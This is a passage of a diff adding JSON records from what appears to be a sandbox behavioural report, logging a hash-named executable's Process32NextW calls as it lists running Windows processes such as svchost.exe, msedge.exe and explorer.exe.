0, + "id": 1808 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3004" + } + ], + "repeated": 0, + "id": 1809 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3216" + } + ], + "repeated": 0, + "id": 1810 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3544" + } + ], + "repeated": 0, + "id": 1811 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "sihost.exe" + }, + { + "name": "ProcessId", + "value": "3724" + } + ], + "repeated": 0, + "id": 1812 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3740" + } + ], + "repeated": 0, + "id": 1813 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3768" + } + ], + "repeated": 0, + "id": 1814 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "3868" + } + ], + "repeated": 0, + "id": 1815 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3928" + } + ], + "repeated": 0, + "id": 1816 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "3940" + } + ], + "repeated": 0, + "id": 1817 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4056" + } + ], + "repeated": 0, + "id": 1818 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ctfmon.exe" + }, + { + "name": "ProcessId", + "value": "1564" + } + ], + "repeated": 0, + "id": 1819 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4132" + } + ], + "repeated": 0, + "id": 1820 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "explorer.exe" + }, + { + "name": "ProcessId", + "value": "4248" + } + ], + "repeated": 0, + "id": 1821 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4372" + } + ], + "repeated": 0, + "id": 1822 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4432" + } + ], + "repeated": 0, + "id": 1823 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4812" + } + ], + "repeated": 0, + "id": 1824 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4908" + } + ], + "repeated": 0, + "id": 1825 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4936" + } + ], + "repeated": 0, + "id": 1826 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "StartMenuExperienceHost.exe" + }, + { + "name": "ProcessId", + "value": "3508" + } + ], + "repeated": 0, + "id": 1827 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "4712" + } + ], + "repeated": 0, + "id": 1828 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "5144" + } + ], + "repeated": 0, + "id": 1829 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchApp.exe" + }, + { + "name": "ProcessId", + "value": "5324" + } + ], + "repeated": 0, + "id": 1830 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "5444" + } + ], + "repeated": 0, + "id": 1831 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchIndexer.exe" + }, + { + "name": "ProcessId", + "value": "5456" + } + ], + "repeated": 0, + "id": 1832 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "5876" + } + ], + "repeated": 0, + "id": 1833 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "smartscreen.exe" + }, + { + "name": "ProcessId", + "value": "6068" + } + ], + "repeated": 0, + "id": 1834 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SecurityHealthSystray.exe" + }, + { + "name": "ProcessId", + "value": "6108" + } + ], + "repeated": 0, + "id": 1835 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SecurityHealthService.exe" + }, + { + "name": "ProcessId", + "value": "5216" + } + ], + "repeated": 0, + "id": 1836 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6468" + } + ], + "repeated": 0, + "id": 1837 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7000" + } + ], + "repeated": 0, + "id": 1838 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ApplicationFrameHost.exe" + }, + { + "name": "ProcessId", + "value": "7132" + } + ], + "repeated": 0, + "id": 1839 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6384" + } + ], + "repeated": 0, + "id": 1840 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7592" + } + ], + "repeated": 0, + "id": 1841 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7620" + } + ], + "repeated": 0, + "id": 1842 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "audiodg.exe" + }, + { + "name": "ProcessId", + "value": "7760" + } + ], + "repeated": 0, + "id": 1843 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ShellExperienceHost.exe" + }, + { + "name": "ProcessId", + "value": "7964" + } + ], + "repeated": 0, + "id": 1844 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8048" + } + ], + "repeated": 0, + "id": 1845 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TextInputHost.exe" + }, + { + "name": "ProcessId", + "value": "7716" + } + ], + "repeated": 0, + "id": 1846 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "812" + } + ], + "repeated": 0, + "id": 1847 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WinStore.App.exe" + }, + { + "name": "ProcessId", + "value": "7444" + } + ], + "repeated": 0, + "id": 1848 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "4772" + } + ], + "repeated": 0, + "id": 1849 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7408" + } + ], + "repeated": 0, + "id": 1850 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "7736" + } + ], + "repeated": 0, + "id": 1851 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6580" + } + ], + "repeated": 0, + "id": 1852 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6536" + } + ], + "repeated": 0, + "id": 1853 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchProtocolHost.exe" + }, + { + "name": "ProcessId", + "value": "2148" + } + ], + "repeated": 0, + "id": 1854 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dllhost.exe" + }, + { + "name": "ProcessId", + "value": "1592" + } + ], + "repeated": 0, + "id": 1855 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6316" + } + ], + "repeated": 0, + "id": 1856 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SgrmBroker.exe" + }, + { + "name": "ProcessId", + "value": "3540" + } + ], + "repeated": 0, + "id": 1857 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4160" + } + ], + "repeated": 0, + "id": 1858 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6388" + } + ], + "repeated": 0, + "id": 1859 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7140" + } + ], + "repeated": 0, + "id": 1860 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msiexec.exe" + }, + { + "name": "ProcessId", + "value": "6840" + } + ], + "repeated": 0, + "id": 1861 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7556" + } + ], + "repeated": 0, + "id": 1862 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "364" + } + ], + "repeated": 0, + "id": 1863 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "7904" + } + ], + "repeated": 0, + "id": 1864 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "1888" + } + ], + "repeated": 0, + "id": 1865 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "3788" + } + ], + "repeated": 0, + "id": 1866 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "1876" + } + ], + "repeated": 0, + "id": 1867 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "pyw.exe" + }, + { + "name": "ProcessId", + "value": "3876" + } + ], + "repeated": 0, + "id": 1868 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "pythonw.exe" + }, + { + "name": "ProcessId", + "value": "4696" + } + ], + "repeated": 0, + "id": 1869 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "6080" + } + ], + "repeated": 0, + "id": 1870 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "3492" + } + ], + "repeated": 0, + "id": 1871 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "CompatTelRunner.exe" + }, + { + "name": "ProcessId", + "value": "6344" + } + ], + "repeated": 0, + "id": 1872 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TrustedInstaller.exe" + }, + { + "name": "ProcessId", + "value": "4624" + } + ], + "repeated": 0, + "id": 1873 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TiWorker.exe" + }, + { + "name": "ProcessId", + "value": "6300" + } + ], + "repeated": 0, + "id": 1874 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SkypeApp.exe" + }, + { + "name": "ProcessId", + "value": "2636" + } + ], + "repeated": 0, + "id": 1875 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WMIADAP.exe" + }, + { + "name": "ProcessId", + "value": "396" + } + ], + "repeated": 0, + "id": 1876 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "conhost.exe" + }, + { + "name": "ProcessId", + "value": "8172" + } + ], + "repeated": 0, + "id": 1877 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MoUsoCoreWorker.exe" + }, + { + "name": "ProcessId", + "value": "8112" + } + ], + "repeated": 0, + "id": 1878 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "sppsvc.exe" + }, + { + "name": "ProcessId", + "value": "616" + } + ], + "repeated": 0, + "id": 1879 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7472" + } + ], + "repeated": 0, + "id": 1880 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SppExtComObj.Exe" + }, + { + "name": "ProcessId", + "value": "368" + } + ], + "repeated": 0, + "id": 1881 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "CompatTelRunner.exe" + }, + { + "name": "ProcessId", + "value": "6292" + } + ], + "repeated": 0, + "id": 1882 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3056" + } + ], + "repeated": 0, + "id": 1883 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8936" + } + ], + "repeated": 0, + "id": 1884 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8608" + } + ], + "repeated": 0, + "id": 1885 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8292" + } + ], + "repeated": 0, + "id": 1886 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WmiPrvSE.exe" + }, + { + "name": "ProcessId", + "value": "7260" + } + ], + "repeated": 0, + "id": 1887 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "3937597df70645ac297e.exe" + }, + { + "name": "ProcessId", + "value": "9436" + } + ], + "repeated": 0, + "id": 1888 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": 